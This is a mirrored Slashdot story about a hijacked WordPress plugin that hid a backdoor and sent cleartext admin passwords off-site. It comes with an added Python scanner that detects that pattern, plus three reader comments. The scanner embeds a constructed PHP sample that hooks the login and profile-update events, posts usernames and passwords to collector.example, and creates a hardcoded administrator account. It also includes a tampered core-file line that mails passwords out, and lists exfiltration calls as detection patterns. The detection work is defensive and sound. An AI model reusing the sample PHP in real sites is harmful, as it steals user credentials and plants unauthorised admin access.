Slashdot Mirror


WordPress Plugin Comes With a Backdoor, Steals Admin Credentials In Cleartext

An anonymous reader writes that a WordPress plugin for managing custom post types has apparently been forcibly taken over by an Indian developer who has added a backdoor to the code which lets him install files on infected sites. "This backdoor also allows him to download files which add his own admin account to the site, and even alter core WordPress files so every time a user logs in, edits his profile, or a new user account is created, the user's password is collected (in cleartext) and sent to his server. WordPress hasn't moved in to ban the plugin just yet, despite user complaints."
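The capture-and-exfiltrate pattern the submission describes can be triaged statically before anyone has to read the whole plugin. The following is an added example written for this mirror, not code from the plugin in the story or from WordPress itself: a Python scanner that flags a PHP file when it both registers a callback on a WordPress hook that sees the cleartext password and calls something that can send data off the host, notes attempts to plant an administrator account, and compares core files against a checksum manifest. The PHP snippets, the collector hostname, the plugin and file names and the manifest are constructed for the demo; the hook names and the WordPress/PHP function names are real.

```python
"""Static triage for the pattern in the story: a plugin that hooks the
WordPress events where a cleartext password is visible, ships it off-site,
plants an admin account, and tampers with core files.
Added example for this mirror, not the plugin's or WordPress's own code.
The PHP snippets, collector host and checksum manifest are constructed."""
import re
from hashlib import sha256

# Hooks whose callback sees the cleartext password, either as an argument
# or via $_POST['pass1'] while the hook fires. Treating exactly these as
# sensitive is this scanner's own choice; the hook names are WordPress's.
PASSWORD_HOOKS = {
    "wp_authenticate":      "action: (&$username, &$password) on every login",
    "wp_authenticate_user": "filter: ($user, $password)",
    "authenticate":         "filter: ($user, $username, $password)",
    "check_password":       "filter: ($check, $password, $hash, $user_id)",
    "password_reset":       "action: ($user, $new_pass)",
    "profile_update":       "action: $_POST['pass1'] holds the new password",
    "user_register":        "action: $_POST['pass1'] holds the new password",
}
# Ways to get data off the host, and ways to plant an extra admin account.
EXFIL_CALLS = ("wp_remote_post", "wp_remote_get", "wp_remote_request",
               "curl_init", "fsockopen", "file_get_contents", "wp_mail", "mail")
ADMIN_CALLS = ("wp_create_user", "wp_insert_user", "set_role")

HOOK_RE = re.compile(r"""add_(?:action|filter)\s*\(\s*['"]([A-Za-z0-9_]+)['"]""")
CALL_RE = re.compile(r"\b(" + "|".join(EXFIL_CALLS + ADMIN_CALLS) + r")\s*\(")
URL_RE = re.compile(r"""https?://[^'"\s)]+""")
ADMIN_ROLE_RE = re.compile(r"""['"]administrator['"]""")


def scan_php(path, source):
    """Return a finding dict for one PHP file. A password hook alone is
    normal (2FA / password-policy plugins) and an outbound call alone is
    normal (update checks); the combination is what earns CRITICAL."""
    hooks = sorted({h for h in HOOK_RE.findall(source) if h in PASSWORD_HOOKS})
    calls = set(CALL_RE.findall(source))
    exfil = sorted(calls.intersection(EXFIL_CALLS))
    urls = sorted(set(URL_RE.findall(source)))
    admin = bool(calls.intersection(ADMIN_CALLS)) and bool(ADMIN_ROLE_RE.search(source))
    if hooks and exfil:
        verdict = "CRITICAL"
    elif admin:
        verdict = "SUSPICIOUS"
    else:
        verdict = "ok"
    return {"path": path, "hooks": hooks, "exfil": exfil, "urls": urls,
            "admin_creation": admin, "verdict": verdict}


def verify_core(on_disk, manifest):
    """Compare core files with a checksum manifest (constructed here; in
    practice you would use the per-release checksums WordPress publishes).
    Returns (path, reason) for anything modified or not shipped with core."""
    problems = []
    for path, content in on_disk.items():
        expected = manifest.get(path)
        if expected is None:
            problems.append((path, "not in manifest"))
        elif sha256(content.encode()).hexdigest() != expected:
            problems.append((path, "modified"))
    return problems


# --- constructed samples (not the real plugin's code) ---------------------
MALICIOUS_PHP = r"""<?php
add_action('wp_authenticate', 'cpt_sync', 10, 2);
function cpt_sync($user, $pass) {
    wp_remote_post('http://collector.example/l.php',
        array('body' => array('u' => $user, 'p' => $pass, 's' => home_url())));
}
add_action('profile_update', function ($id) {
    if (!empty($_POST['pass1']))
        wp_remote_post('http://collector.example/l.php',
            array('body' => array('id' => $id, 'p' => $_POST['pass1'])));
});
if (!username_exists('cpt_admin')) {
    $id = wp_create_user('cpt_admin', 'Pa55w0rd!', 'x@example.invalid');
    (new WP_User($id))->set_role('administrator');
}
"""
BENIGN_PHP = r"""<?php
// A 2FA-style plugin: touches the password hook but sends nothing anywhere.
add_filter('authenticate', 'my_second_factor', 30, 3);
"""
PRISTINE = {"wp-login.php": "<?php // pristine login\n",
            "wp-includes/pluggable.php": "<?php // pristine pluggable\n"}
CORE_MANIFEST = {p: sha256(c.encode()).hexdigest() for p, c in PRISTINE.items()}
ON_DISK = {
    "wp-login.php": PRISTINE["wp-login.php"],
    # Core file with a line appended: the kind of edit the story describes.
    "wp-includes/pluggable.php": PRISTINE["wp-includes/pluggable.php"]
        + "mail('x@collector.example', 'p', $password);\n",
    "wp-content/x.php": "<?php // dropped file, not shipped with core\n",
}

if __name__ == "__main__":
    for name, src in (("cpt-plugin.php", MALICIOUS_PHP), ("2fa.php", BENIGN_PHP)):
        print(scan_php(name, src))
    print(verify_core(ON_DISK, CORE_MANIFEST))
```

Run it against a plugin directory by feeding each `.php` file's contents to `scan_php`; the benign sample shows why a hook match alone should not page anyone, and the manifest check is what catches the "alter core WordPress files" half of the story, which no plugin-directory scan will see.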

3 of 76 comments

  1. Plugin has been suppressed from the WordPress site by Herve5 · Score: 4, Informative

    I find the info quite aggressive against WP; the plugin indeed has been banned, and before this second post...

    --
    Herve S.
  2. This took longer to happen than I thought by dbIII · Score: 2, Informative

    Seriously guys, I know it's the quick and lazy way to put together a website, but it's obvious that this sort of thing is going to happen in that creaking pile of PHP, intentional or otherwise.

  3. Re:Chill. It's just a buggy update feature. by Anonymous Coward · Score: 2, Informative

    Jesus man, RTFA once in a while. It's completely, 100%, malicious intent. It adds an admin user to the site with the dev's name/group name, and in case he couldn't log in he used the backdoor to upload a custom PHP script onto the installation to modify the wp-options file.

    When is the last time you've "accidentally" introduced a bug that sends all user logins to a server in India in cleartext by mistake? Does the fact that this plugin was dead for a year and suddenly has this new superpower not worry you?